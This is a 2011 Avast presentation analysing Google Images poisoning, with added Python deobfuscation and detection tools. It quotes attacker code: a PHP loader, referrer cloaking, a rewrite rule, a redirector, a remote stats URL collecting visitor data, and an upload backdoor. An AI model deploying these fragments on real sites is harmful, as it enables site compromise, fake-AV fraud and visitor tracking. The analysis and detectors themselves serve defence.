Analysis of Google Images Poisoning
Lukáš Hasík, Jan Širmer
www.avast.com
AVAR 2011
Agenda
• What is Google-images poisoning?
• How it works
• Doorway generator
• JavaScript redirector
• Evolution
• Data from AVAST CommunityIQ userbase
• Summary
• Questions
Google Images poisoning
• SEO blackhat poisoning attack
• Uses hacked sites to redirect users to sites containing fake AV or exploits
• Uses keyword-rich pages with hot-linked images for higher indexing by search bots
• Images from hacked sites appear near the top of the search results
• Focused on users coming from well-known search engines
Google Images poisoning: How it works?
[Diagram: User, Google search results, Infected server]
Google Images poisoning: Fake antiviruses
[Diagram: User, Infected server, Remote server, Fake AV]
Google Images poisoning
[Diagram: User, Infected server, Remote server, Fake AV, Bad guy]
Why is it so successful?
• Great SEO and nobody used SEO for “images”
Why is it so successful? (2)
[Diagram: Infected server, Fake AV]
• Computer users do not expect that they can get infected when searching for images on legitimate sites
Why is it so successful? (3)
• Hide and Seek
– if users are using the Opera browser or they are coming from Google, Yahoo or Bing, they are served a JavaScript redirector
[Diagram: Malicious content]
Your website gets infected
• The bad guys are using stolen FTP credentials
• They upload a PHP script to the web server
• This script is used for uploading malicious content to the web server, creating spam pages, and uploading additional files to the web server
• Bonus feature - it lets the owners know that the page is ready
Additional malicious files
• Xmlrpc.txt – remote server address stored
• -> Xml.txt -> Xml.cgi – address in Base64
• Iog.txt – redirecting JavaScript stored
• Shab100500.txt – spam HTML template stored
• -> Don.txt – HTML template in Base64
PHP script on infected sites
• Earlier, they used names such as d{1,3}.php
• Today, they use names like microphone.php, etc.
• This script is responsible for:
1. Creating spam pages for Google bot indexing
2. Changing .htaccess
3. Serving the redirect script to users, leading to exploit sites
4. Serving the redirect script to users, leading to fake AV
5. Downloading malicious files to the server
6. Telling the owners that the site is ready
PHP script
Original PHP file uploaded to the server:
<?eval(gzuncompress(base64_decode('eNqVWG2P4kYM/…/woBlZVjC9zK2Ok8McOZrF5z9hfM+5P/AbQiT9I=')));?>
PHP script
PHP file after the first step of deobfuscation (fragments):
$GLOBALS['_1600532410_']=Array(base64_decode('ZXJyb3Jfcm'.'Vwb3J0'.'aW5'.'n' …
Function _1070120820($i){$a=Array('c'.'Q='.'=','cQ==', …
($GLOBALS['_1600532410_'][16](_1070120820(6))) {…
The string literals are split into concatenated chunks; joined and base64-decoded, 'ZXJyb3JfcmVwb3J0aW5n' is error_reporting and 'cQ==' is q. The array in $GLOBALS holds such decoded names and the script calls them indirectly by index, as in $GLOBALS['_1600532410_'][16](...).
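The two slides above show the eval(gzuncompress(base64_decode(...))) wrapper and the split string literals underneath it. The following Python is an added example, not code from the slides or from Avast: it peels the wrapper statically (PHP's gzuncompress is zlib decompression, so nothing is executed), joins 'a'.'b' concatenations, and decodes the second-stage literals. The function names are my own, and the sample payload is constructed here from the two literals visible on the slide.

```python
import base64
import re
import zlib

# Outer wrapper as shown on the slide: eval(gzuncompress(base64_decode('...')))
# The literal may be a PHP concatenation of quoted chunks, e.g. 'ZXJy'.'b3Jf', so the
# group captures one or more single-quoted chunks optionally joined by '.'
_WRAPPER = re.compile(
    r"eval\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\(\s*((?:'[^']*'\s*\.?\s*)+)\)\s*\)\s*\)",
    re.S,
)
# Any remaining base64_decode('a'.'b'...) call in the unwrapped code (second-stage strings)
_CONCAT_B64 = re.compile(r"base64_decode\s*\(\s*((?:'[^']*'\s*\.?\s*)+)\)")
_CHUNK = re.compile(r"'([^']*)'")


def join_php_literal(expr: str) -> str:
    """Collapse a PHP concatenation 'ab'.'cd'.'ef' into the single string abcdef."""
    return "".join(_CHUNK.findall(expr))


def unwrap_layers(php_source: str, max_layers: int = 10) -> tuple[str, int]:
    """Peel eval(gzuncompress(base64_decode(...))) wrappers statically, never executing PHP.
    PHP's gzuncompress() is zlib (RFC 1950) decompression, which zlib.decompress() handles.
    Returns the innermost source and the number of layers removed."""
    src, layers = php_source, 0
    while layers < max_layers:
        m = _WRAPPER.search(src)
        if not m:
            break
        blob = base64.b64decode(join_php_literal(m.group(1)))
        src = zlib.decompress(blob).decode("utf-8", errors="replace")
        layers += 1
    return src, layers


def decode_concat_literals(php_source: str) -> dict[str, str]:
    """Map each base64_decode('..'.'..') argument (joined) to its decoded text."""
    found = {}
    for m in _CONCAT_B64.finditer(php_source):
        joined = join_php_literal(m.group(1))
        try:
            found[joined] = base64.b64decode(joined, validate=True).decode("utf-8", errors="replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            found[joined] = "<not valid base64>"
    return found


def build_sample(inner_php: str, chunk: int = 8) -> str:
    """Constructed test fixture: wrap a harmless snippet the way the dropper wraps its payload,
    splitting the base64 literal into '.'-joined chunks to mimic the concatenation trick."""
    blob = base64.b64encode(zlib.compress(inner_php.encode())).decode()
    pieces = [blob[i:i + chunk] for i in range(0, len(blob), chunk)]
    return "<?eval(gzuncompress(base64_decode('" + "'.'".join(pieces) + "')));?>"


# Constructed second-stage snippet built from the two literals visible on the slide
INNER = ("$GLOBALS['_1600532410_']=Array(base64_decode('ZXJyb3Jfcm'.'Vwb3J0'.'aW5'.'n'),"
         "base64_decode('cQ=='));")
SAMPLE = build_sample(INNER)

if __name__ == "__main__":
    code, n = unwrap_layers(SAMPLE)
    print(f"layers removed: {n}")
    print(code)
    print(decode_concat_literals(code))
```

Because the wrapper is matched and decoded rather than evaluated, the same loop also handles a payload wrapped twice, which is worth checking on real samples before assuming the first decoded layer is the final script.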
PHP script after removing obfuscation (excerpt)
if (strpos($_SERVER['HTTP_USER_AGENT'], 'Opera') !== false) {
}
if (strpos($_SERVER['HTTP_REFERER'], 'google.') ||
    strpos($_SERVER['HTTP_REFERER'], 'yahoo.') ||
    strpos($_SERVER['HTTP_REFERER'], 'bing.') > 0) {
    $_10 = file_get_contents('.log/' . $_4 . '/xmlrpc.txt');
Doorway generator
• The HTML template is stored in the file .log/SITE/shab100500.txt
• In the new version, shab100500.txt was replaced by don.txt
Template with the <Replaceme> placeholder:
<HTML>
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut
labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco
laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut
labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco
</HTML>
<Replaceme>
</Replaceme>
Doorway generator
• Get descriptions of the top 50 ‘search keywords’ from Google web
• Shuffle the words in their descriptions to get unique text
Sample of the shuffled text: “harmful action against a person or group in response revenge to a grievance, be it real or rick santorum perceived”
Doorway generator
• Get the top 20 ‘search keyword’ results from Google Images and extract links to the image files
• Generate <img> tags and shuffle them
Generated tag: <img src="http://SITE/path/hot-linked-image.jpg" alt="search keywords" align="random(center, right, left)">
Doorway generator
[Diagram: the shuffled keyword text and the shuffled <img> tags are interleaved]
Result: harmful action against a person or group in response revenge to a grievance<img src="http://SITE/path/hot-linked-image.jpg" alt="search keywords" align="random(center, right, left)">
Doorway generator
[Diagram: the template with its <Replaceme> block filled in]
Structure of the generated page:
• <h1>SEARCH KEYWORD</h1>
• Suggested links
• Links to the 30 most recently generated pages
• Rich-word generated text with hot-linked images
• Links to alternative pages
How do they make image URLs less suspicious?
• The PHP script writes a catch-all rewrite into .htaccess, substituting its own path ($_SERVER['SCRIPT_NAME']):
"RewriteEngine On
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ ".$_SERVER['SCRIPT_NAME']."?q=$1 [L]"
• this changes the URL from the suspicious
http://SITE/wp-admin/BAD.php?q=search-keywords
to
http://SITE/wp-admin/search-keywords
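Both the dropped-file list (xmlrpc.txt, xml.txt, xml.cgi, iog.txt, shab100500.txt, don.txt under .log/SITE/) and the catch-all .htaccess rule above are things a site owner can look for on disk. The Python below is an added example, not code from the slides or from Avast: it walks a document root, reports those file names when they sit under a .log directory, decodes the ones the slides say are Base64, and flags any .htaccess whose RewriteRule sends every non-existent path into a PHP script's ?q= parameter. The fixture it scans is constructed in a temporary directory with hypothetical .invalid host names; the function names are my own.

```python
import base64
import os
import re
import tempfile

# Dropped files named on the "Additional malicious files" slide, keyed by lower-case name;
# all of them live under .log/SITE/ next to the PHP script, and three carry Base64 content
INDICATOR_FILES = {
    "xmlrpc.txt": "remote server address",
    "xml.txt": "remote server address (base64)",
    "xml.cgi": "remote server address (base64)",
    "iog.txt": "redirecting JavaScript",
    "shab100500.txt": "spam HTML template",
    "don.txt": "spam HTML template (base64)",
}
BASE64_FILES = {"xml.txt", "xml.cgi", "don.txt"}

# Catch-all rewrite from the .htaccess slide: every path that is not a real file or
# directory is routed into one PHP script's ?q= parameter
_CATCHALL_RULE = re.compile(r"RewriteRule\s+\^\(\.\*\)\$\s+(\S+?\.php)\?q=\$1", re.I)


def _decode_b64_file(path: str):
    """Return the decoded text of a Base64 file, or None if it is not valid Base64."""
    with open(path, "rb") as fh:
        raw = fh.read().strip()
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8", errors="replace")
    except ValueError:
        return None


def scan_webroot(root: str) -> list:
    """Walk a document root and report the indicator files and the catch-all rewrite."""
    findings = []
    for dirpath, _dirs, filenames in os.walk(root):
        in_log_dir = ".log" in os.path.relpath(dirpath, root).split(os.sep)
        for name in filenames:
            path = os.path.join(dirpath, name)
            lower = name.lower()
            if in_log_dir and lower in INDICATOR_FILES:
                finding = {"path": path, "kind": INDICATOR_FILES[lower]}
                if lower in BASE64_FILES:
                    finding["decoded"] = _decode_b64_file(path)
                findings.append(finding)
            elif lower == ".htaccess":
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
                m = _CATCHALL_RULE.search(text)
                if m and "!-f" in text and "!-d" in text:
                    findings.append({"path": path, "kind": "catch-all rewrite", "target": m.group(1)})
    return findings


def build_sample_webroot() -> str:
    """Constructed fixture (hypothetical host names) laid out like an infected site on the slides."""
    root = tempfile.mkdtemp(prefix="webroot_")
    site = os.path.join(root, ".log", "example.invalid")
    os.makedirs(site)
    with open(os.path.join(site, "xmlrpc.txt"), "w") as fh:
        fh.write("http://remote.invalid/out/\n")
    with open(os.path.join(site, "xml.cgi"), "w") as fh:
        fh.write(base64.b64encode(b"http://remote.invalid/out/").decode())
    with open(os.path.join(site, "shab100500.txt"), "w") as fh:
        fh.write("<HTML>Lorem ipsum</HTML><Replaceme></Replaceme>")
    admin = os.path.join(root, "wp-admin")
    os.makedirs(admin)
    with open(os.path.join(admin, ".htaccess"), "w") as fh:
        fh.write("RewriteEngine On\n"
                 "RewriteCond %{REQUEST_FILENAME} !-f\n"
                 "RewriteCond %{REQUEST_FILENAME} !-d\n"
                 "RewriteRule ^(.*)$ /wp-admin/microphone.php?q=$1 [L]\n")
    with open(os.path.join(root, ".htaccess"), "w") as fh:  # benign rule, must not be flagged
        fh.write("RewriteEngine On\nRewriteRule ^index\\.php$ - [L]\n")
    return root


def sample_findings() -> list:
    """Build the constructed fixture and scan it."""
    return scan_webroot(build_sample_webroot())


if __name__ == "__main__":
    for finding in sample_findings():
        print(finding)
```

The rewrite check deliberately requires both !-f and !-d conditions next to the ^(.*)$ rule, because that combination is what makes the rule route only missing paths and so keeps the real site working while the doorway URLs look like ordinary directories.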
PHP script evolution
• The first version was focused on all users using the Opera browser or users coming from Google, Yahoo or Bing
• During June, we found some changes in the PHP code
- Google is the only target
- New redirection system
• The request goes to a remote server (mydiarycom.net) - centralized
• They have statistical data from the parameters
• No need to update iog.txt (the redirecting script) or make differentiating changes on each server
Data parameters
http://mydiarycom.net/out/stat.cgi?parameter=
1. Name of the doorway site
2. The full URL of doorway script
3. Visitor’s IP
4. The referring URL
5. The User-Agent of the user’s browser
6. The search query used on Google
IP address and user-agents
[Figure: Fake AV]
[Figure: Spam page]
JavaScript redirector
var URL = "SITE contains FakeAV"
  + encodeURIComponent(document.referrer)
  + "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="
  + encodeURIComponent(document.URL)
  + "&default_keyword=default";
if (window != top) { top.location.href = URL; }
else document.location = URL;
Redirection
• Mac – http://IP/r/RANDOM_STRING
IP and ‘r’ change every 30 minutes
• Exploit site - http://SITE/index.php?tp=RANDOM_STRING
Site and ‘tp’ change every 30 minutes
• Fake AV – http://SITE/fast-scan/
Other changes
• Rotating user-agent string
• Password-protected maintenance request
Someone who knows how this algorithm works can easily change it and redirect to his or her own site
• Xml.txt was replaced by xml.cgi
• Working with free blog sites
Password-protected maintenance request
if ($_GET['dom100500'] != '') { $_13 = fopen('.log/' . $_4 . '/xmlrpc.txt', 'w+'); fwrite($_13, $_GET['dom100500']); fclose($_13); }
if ($_GET['up100500'] != '') { $_14 = ''; $_14 = $_14 . basename($_FILES['uploaded']['name']); $_15 = round(0+0.5+0.5); if (move_uploaded_file($_FILES['uploaded']['tmp_name'], $_14)) …
The dom100500 parameter overwrites the remote server address in xmlrpc.txt; the up100500 parameter stores an uploaded file under the name the uploader chose.
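The maintenance-request parameters above (dom100500, up100500) and the script names from the "PHP script on infected sites" slide (d{1,3}.php, microphone.php) all appear in the web server's access log, as does the search-engine referrer the script keys on. The Python below is an added example, not code from the slides or from Avast: it parses combined-format log lines and tags the ones that match those indicators. The log lines are constructed here with RFC 5737 addresses and .invalid host names; the tag names and function names are my own.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache/nginx "combined" log format; the sample lines below are constructed in that shape
_COMBINED = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Control parameters from the "password-protected maintenance request" slide
CONTROL_PARAMS = {"dom100500", "up100500"}
# Script names from the "PHP script on infected sites" slide: d{1,3}.php earlier, microphone.php later
_DOORWAY_SCRIPT = re.compile(r"/(?:d\d{1,3}|microphone)\.php$", re.I)
# Referrers the script keys on (google., yahoo., bing.)
_SEARCH_REFERER = re.compile(r"^https?://[^/]*\b(?:google|yahoo|bing)\.", re.I)


def classify(line: str) -> list:
    """Return the indicator tags that apply to one access-log line (empty list if none)."""
    m = _COMBINED.match(line)
    if not m:
        return ["unparsed"]
    url = urlsplit(m.group("target"))
    params = parse_qs(url.query, keep_blank_values=True)
    tags = []
    if CONTROL_PARAMS.intersection(params):
        tags.append("maintenance-request")  # operator updating xmlrpc.txt or uploading a file
    if m.group("method").upper() == "POST" and "up100500" in params:
        tags.append("file-upload")
    if _DOORWAY_SCRIPT.search(url.path):
        tags.append("doorway-script")
    if "q" in params and _SEARCH_REFERER.match(m.group("referer")):
        tags.append("search-referred-doorway-hit")  # the victim path: search engine -> ?q= page
    return tags


def triage(lines) -> dict:
    """Map line index -> tags for every line that matched at least one indicator."""
    result = {}
    for i, line in enumerate(lines):
        tags = classify(line)
        if tags:
            result[i] = tags
    return result


# Constructed sample lines (RFC 5737 addresses, .invalid host names); not real log data
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Jun/2011:10:01:02 +0200] "GET /wp-admin/microphone.php?dom100500=http://remote.invalid/out/ HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Jun/2011:10:01:09 +0200] "POST /wp-admin/microphone.php?up100500=1 HTTP/1.1" 200 5 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Jun/2011:10:05:44 +0200] "GET /wp-admin/microphone.php?q=search-keywords HTTP/1.1" 200 4021 "http://www.google.com/imgres?q=search+keywords" "Opera/9.80"',
    '198.51.100.9 - - [12/Jun/2011:10:06:01 +0200] "GET /index.php HTTP/1.1" 200 8122 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for idx, tags in triage(SAMPLE_LOG).items():
        print(idx, tags)
```

Once the catch-all rewrite is in place the victim requests no longer carry ?q= in the log (the rewrite happens after logging of the original URI), so on such a site the search-referrer tag is best combined with a check for paths that do not exist on disk.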
Data from the AVAST CommunityIQ
• From March to August 2011, we discovered 22,580 unique infected sites
• 5,698 sites are still infected
• Typo: <IMG HEIGTH="1" WIDTH
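The generated page structure from the doorway generator slides (an <h1> with the search keyword, hot-linked images whose alt text repeats the keyword, align attributes drawn from center/right/left) and the HEIGTH typo noted above are all visible in the served HTML. The Python below is an added example, not code from the slides or from Avast: it extracts those traits from a page with the standard library parser and applies a simple decision rule. The two HTML documents are constructed here with .invalid host names, and the thresholds in is_doorway are my own assumptions rather than figures from the presentation.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _PageCollector(HTMLParser):
    """Collect <img> attributes and <h1> text; html.parser lower-cases tag and attribute names."""

    def __init__(self):
        super().__init__()
        self.imgs = []      # (src, alt, align)
        self.h1_text = []
        self._in_h1 = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "img":
            self.imgs.append((a.get("src") or "", a.get("alt") or "", a.get("align")))
        elif tag == "h1":
            self._in_h1 = True

    def handle_endtag(self, tag):
        if tag == "h1":
            self._in_h1 = False

    def handle_data(self, data):
        if self._in_h1:
            self.h1_text.append(data.strip())


def doorway_signals(html: str, own_host: str) -> dict:
    """Count the traits of a generated doorway page described on the slides."""
    p = _PageCollector()
    p.feed(html)
    h1 = " ".join(t for t in p.h1_text if t).lower()
    hotlinked = 0
    for src, _alt, _al in p.imgs:
        host = urlsplit(src).netloc.lower()
        if host and host != own_host.lower():  # image served from another site
            hotlinked += 1
    return {
        "images": len(p.imgs),
        "hotlinked": hotlinked,
        "alt_equals_h1": sum(1 for _s, alt, _al in p.imgs if h1 and alt.lower() == h1),
        "aligned": sum(1 for _s, _alt, al in p.imgs if al in ("center", "right", "left")),
        "heigth_typo": len(re.findall(r"<img[^>]*\bheigth=", html, re.I)),
    }


def is_doorway(sig: dict) -> bool:
    """Decision rule; the thresholds are assumptions to tune against your own pages."""
    if sig["heigth_typo"] > 0:
        return True
    return sig["hotlinked"] >= 3 and (sig["alt_equals_h1"] >= 3 or sig["aligned"] >= 3)


# Constructed page shaped like the generator output on the slides (hypothetical hosts)
DOORWAY_HTML = """<html><body>
<h1>search keywords</h1>
<p>harmful action against a person or group in response revenge to a grievance
<img src="http://other-site.invalid/path/hot-linked-image.jpg" alt="search keywords" align="center">
<img src="http://another.invalid/a.jpg" alt="search keywords" align="right">
<img src="http://third.invalid/b.jpg" alt="search keywords" align="left">
<img src="http://fourth.invalid/c.jpg" alt="search keywords" align="center">
<IMG HEIGTH="1" WIDTH="1" src="http://fifth.invalid/d.gif" alt="search keywords" align="center">
</p></body></html>"""

# Constructed ordinary page: local images and one image from the site's own host
BENIGN_HTML = """<html><body><h1>My holiday photos</h1>
<img src="/photos/beach.jpg" alt="beach at sunset">
<img src="https://www.example.com/photos/hill.jpg" alt="a hill"></body></html>"""

if __name__ == "__main__":
    for name, html, host in (("doorway", DOORWAY_HTML, "victim.invalid"),
                             ("benign", BENIGN_HTML, "www.example.com")):
        sig = doorway_signals(html, host)
        print(name, sig, is_doorway(sig))
```

The misspelled HEIGTH attribute is treated as decisive on its own because browsers ignore unknown attributes, so it survives in the served page while carrying no legitimate purpose; the remaining signals back each other up when a later generator version fixes the typo.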
[Chart: Infected domains]
[Chart: Number of infected domains]
Summary
• Google-image poisoning is an easy way to spread fake AV and exploits
• It is based on stolen FTP credentials of webmasters and great backdoor algorithms
• The number of infected legitimate domains is growing every day
• Common sense is not sufficient protection
Questions and Answers
Thank you
Jan Sirmer (sirmer@avast.com)
Senior Virus Analyst
Lukas Hasik (hasik@avast.com)
QA Director

Google-image poisoning: How hackers use images to spread malware

  • 1. Analysis of Google Images Poisoning
    Lukáš Hasík, Jan Širmer
    www.avast.com
  • 2. AVAR 2011 – Agenda
    – What is Google-images poisoning?
    – How it works
    – Doorway generator
    – JavaScript redirector
    – Evolution
    – Data from the AVAST CommunityIQ userbase
    – Summary
    – Questions
  • 3. Google Images poisoning
    – SEO blackhat poisoning attack
    – Uses hacked sites to redirect users to sites containing fake AV or exploits
    – Uses keyword-rich pages with hot-linked images for higher indexing by search bots
    – Images from hacked sites appear near the top of the search results
    – Focused on users coming from well-known search engines
  • 4. Google Images poisoning – How it works? (diagram: User → Infected server)
  • 5. Google search results (screenshot)
  • 6. Google Images poisoning (diagram: User → Infected server → Remote server → Fake AV)
  • 8. Google Images poisoning (diagram: User → Infected server → Remote server → Fake AV → Bad guy)
  • 9. Why is it so successful?
    – Great SEO, and nobody used SEO for “images”
  • 10. Why is it so successful? (2) (diagram: Infected server → Fake AV)
    – Computer users do not expect that they can get infected when searching for images on legitimate sites
  • 11. Why is it so successful? (3)
    – Hide and seek – if users are using the Opera browser or they are coming from Google, Yahoo or Bing, they are served a JavaScript redirector (diagram: Malicious content)
  • 12. Your website gets infected
    – The bad guys are using stolen FTP credentials
    – They upload a PHP script to the web server
    – This is used for uploading malicious content to the web server, creating spam pages, and uploading additional files to the web server
    – Bonus feature: it lets the owners know that the page is ready
  • 13. Additional malicious files
    – Xmlrpc.txt – remote server address stored
    – -> Xml.txt -> Xml.cgi – address in Base64
    – Iog.txt – redirecting JavaScript stored
    – Shab100500.txt – spam HTML template stored
    – -> Don.txt – HTML template in Base64
  • 14. PHP script on infected sites
    – Earlier, they used names such as d{1,3}.php
    – Today, they use names like microphone.php, etc.
    – This script is responsible for:
      1. Creating spam pages for Google bot indexing
      2. Changing .htaccess
      3. Serving the redirect script to users to exploit sites
      4. Serving the redirect script to users to fake AV
      5. Downloading malicious files to the server
      6. Telling the owners that the site is ready
  • 15. PHP script – the original PHP file uploaded to the server
      <?eval(gzuncompress(base64_decode('eNqVWG2P4kYM/…/woBlZVjC9zK2Ok8McOZrF5z9hfM+5P/AbQiT9I='))); ?>
  • 16. PHP script – the PHP file after the first step of deobfuscation
      $GLOBALS['_1600532410_'] = Array(base64_decode('ZXJyb3Jfcm'.'Vwb3J0'.'aW5'.'n ...
      function _1070120820($i) { $a = Array('c'.'Q='.'=', 'cQ==', ...
      ($GLOBALS['_1600532410_'][16](_1070120820(6))) { ...
  • 17. PHP script after removing the obfuscation
      if (strpos($_SERVER['HTTP_USER_AGENT'], 'Opera') !== false) { }
      if (strpos($_SERVER['HTTP_REFERER'], 'google.') || strpos($_SERVER['HTTP_REFERER'], 'yahoo.') || strpos($_SERVER['HTTP_REFERER'], 'bing.') > 0) {
          $_10 = file_get_contents('.log/' . $_4 . '/xmlrpc.txt');
  • 18. Doorway generator
    – The HTML template is stored in the file .log/SITE/shab100500.txt
    – In the new version, shab100500.txt was replaced by don.txt
    (template illustration)
      <HTML> Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco </HTML>
      <Replaceme> </Replaceme>
  • 19. Doorway generator
    – Get descriptions of the top 50 ‘search keywords’ from Google web
    – Shuffle the words into their descriptions to get unique text
    (example of the shuffled text) harmful action against a person or group in response revenge to a grievance, be it real or rick santorum perceived
  • 20. Doorway generator
    – Get the top 20 ‘search keyword’ from Google Images and extract links to image files
    – Generate <img> tags and shuffle them
      <img src="http://SITE/path/hot-linked-image.jpg" alt="search keywords" align="random(center, right, left)">
  • 21. Doorway generator – the shuffled text from slide 19 and the <img> tags from slide 20 are interleaved:
      harmful action against a person or group in response revenge to a grievance<img src="http://SITE/path/hot-linked-image.jpg" alt="search keywords" align="random(center, right, left)">
  • 22. Doorway generator – the generated page (the slide-18 template with the <Replaceme> block filled in):
      <h1>SEARCH KEYWORD</h1>
      Suggested links
      Links to the 30 most recently generated pages
      Rich-word generated text with hot-linked images
      Links to alternative pages
  • 23. How do they make image URLs less suspicious?
    – The .htaccess content written by the PHP script:
      "RewriteEngine On
      RewriteCond %{REQUEST_FILENAME} !-f
      RewriteCond %{REQUEST_FILENAME} !-d
      RewriteRule ^(.*)$ " . $_SERVER['SCRIPT_NAME'] . "?q=$1 [L]"
    – This changes the URL from the suspicious http://SITE/wp-admin/BAD.php?q=search-keywords to http://SITE/wp-admin/search-keywords
  • 24. PHP script evolution
    – The first version was focused on all users using the Opera browser or users coming from Google, Yahoo or Bing
    – During June, we found some changes in the PHP code:
      - Google is the only target
      - New redirection system
    – The request goes to a remote server (mydiarycom.net) – centralized
    – They have statistical data from the parameters
    – No need to update iog.txt (the redirecting script) or make differentiating changes on each server
  • 25. Data parameters
      http://mydiarycom.net/out/stat.cgi?parameter=
      1. Name of the doorway site
      2. The full URL of the doorway script
      3. Visitor’s IP
      4. The referring URL
      5. The User-Agent of the user’s browser
      6. The search query used on Google
  • 26. IP address and user-agents (screenshot: Fake AV)
  • 27. IP address and user-agents (screenshot: Spam page)
  • 28. JavaScript redirector
      var URL = "SITE contains FakeAV"
          + encodeURIComponent(document.referrer)
          + "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER="
          + encodeURIComponent(document.URL)
          + "&default_keyword=default";
      if (window != top) { top.location.href = URL; } else document.location = URL;
  • 29. Redirection
    – Mac – http://IP/r/RANDOM_STRING; the IP and ‘r’ are changed every 30 minutes
    – Exploit site – http://SITE/index.php?tp=RANDOM_STRING; the site and ‘tp’ are changed every 30 minutes
    – Fake AV – http://SITE/fast-scan/
  • 30. Other changes
    – Rotating user-agent string
    – Password-protected maintenance request – someone who knows how this algorithm works can easily change it and redirect to his or her own site
    – Xml.txt was replaced by xml.cgi
    – Working with free blog sites
  • 31. Password-protected maintenance request
      if ($_GET['dom100500'] != '') {
          $_13 = fopen('.log/' . $_4 . '/xmlrpc.txt', 'w+');
          fwrite($_13, $_GET['dom100500']);
          fclose($_13);
      }
      if ($_GET['up100500'] != '') {
          $_14 = '';
          $_14 = $_14 . basename($_FILES['uploaded']['name']);
          $_15 = round(0 + 0.5 + 0.5);
          if (move_uploaded_file($_FILES['uploaded']['tmp_name'], $_14))
  • 32. Data from the AVAST CommunityIQ
    – From March to August 2011, we discovered 22,580 unique infected sites
    – 5,698 sites are still infected
    – Typo: <IMG HEIGTH="1" WIDTH
  • 34. Number of infected domains (chart)
  • 35. Summary
    – Google-image poisoning is an easy way to spread fake AV and exploits
    – It’s based on stolen FTP credentials of webmasters and great backdoor algorithms
    – The number of infected legitimate domains is growing every day
    – Common sense is not sufficient protection
  • 36. Questions and Answers
  • 37. Thank you
    Jan Sirmer (sirmer@avast.com), Senior Virus Analyst
    Lukas Hasik (hasik@avast.com), QA Director
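The loader on slide 15 is a chain of eval(gzuncompress(base64_decode(...))) layers, and the slide-16 stage hides function names behind split string literals ('ZXJyb3Jfcm'.'Vwb3J0'...) passed to base64_decode. The following Python is an added example of how an analyst peels those layers statically, without running any PHP; it is not the Avast authors' tooling. The obfuscated sample is constructed in the block from a harmless PHP line, because the slides only show a truncated blob. PHP's gzuncompress() consumes zlib-framed data, which Python's zlib.decompress() reads directly.

```python
"""Static peeling of the slide-15/16 style loader (added example, constructed sample)."""
import base64
import re
import zlib
from typing import Optional, Tuple

# One wrapper layer: eval(gzuncompress(base64_decode('<blob>'))), whitespace tolerant.
LAYER_RE = re.compile(
    r"eval\s*\(\s*gzuncompress\s*\(\s*base64_decode\s*\(\s*['\"]"
    r"([A-Za-z0-9+/=\s]+)['\"]\s*\)\s*\)\s*\)\s*;?",
    re.IGNORECASE,
)
# The slide-16 tricks: 'ab'.'cd' string splitting and base64_decode('...') of a literal.
SPLIT_RE = re.compile(r"'([^']*)'\s*\.\s*'([^']*)'")
B64CALL_RE = re.compile(r"base64_decode\s*\(\s*'([A-Za-z0-9+/=]+)'\s*\)")


def build_sample(inner_php: str, layers: int = 2) -> str:
    """Wrap a PHP snippet in `layers` eval/gzuncompress/base64 layers (constructed sample)."""
    code = inner_php
    for _ in range(layers):
        packed = base64.b64encode(zlib.compress(code.encode())).decode()
        code = f"eval(gzuncompress(base64_decode('{packed}')));"
    return "<?" + code + " ?>"


def peel_layer(php: str) -> Optional[str]:
    """Return the code hidden inside the outermost wrapper layer, or None if there is none."""
    m = LAYER_RE.search(php)
    if not m:
        return None
    blob = re.sub(r"\s+", "", m.group(1))
    try:
        return zlib.decompress(base64.b64decode(blob)).decode("utf-8", errors="replace")
    except (ValueError, zlib.error):
        return None


def unwrap(php: str, max_layers: int = 10) -> Tuple[str, int]:
    """Peel wrapper layers until plain code remains; returns (code, layers_removed)."""
    current = php
    for depth in range(max_layers):
        inner = peel_layer(current)
        if inner is None:
            return current, depth
        current = inner
    return current, max_layers


def join_split_strings(php: str) -> str:
    """Collapse 'ZXJy'.'b3Jf' style concatenations into a single literal."""
    prev = None
    while prev != php:
        prev, php = php, SPLIT_RE.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", php)
    return php


def resolve_base64_literals(php: str) -> str:
    """Replace base64_decode('<literal>') with the decoded text when it is printable ASCII."""
    def repl(m: "re.Match[str]") -> str:
        try:
            text = base64.b64decode(m.group(1), validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            return m.group(0)
        return "'" + text.replace("'", "\\'") + "'" if text.isprintable() else m.group(0)
    return B64CALL_RE.sub(repl, php)


def deobfuscate(php: str) -> Tuple[str, int]:
    """Full pass: peel eval layers, then undo string splitting and literal base64 calls."""
    code, layers = unwrap(php)
    return resolve_base64_literals(join_split_strings(code)), layers


# Constructed stand-in for the attacker's body: a harmless line using the slide-16 tricks
# ('ZXJyb3Jfcm'.'Vwb3J0'.'aW5'.'n' is the fragment shown on slide 16; it decodes to error_reporting).
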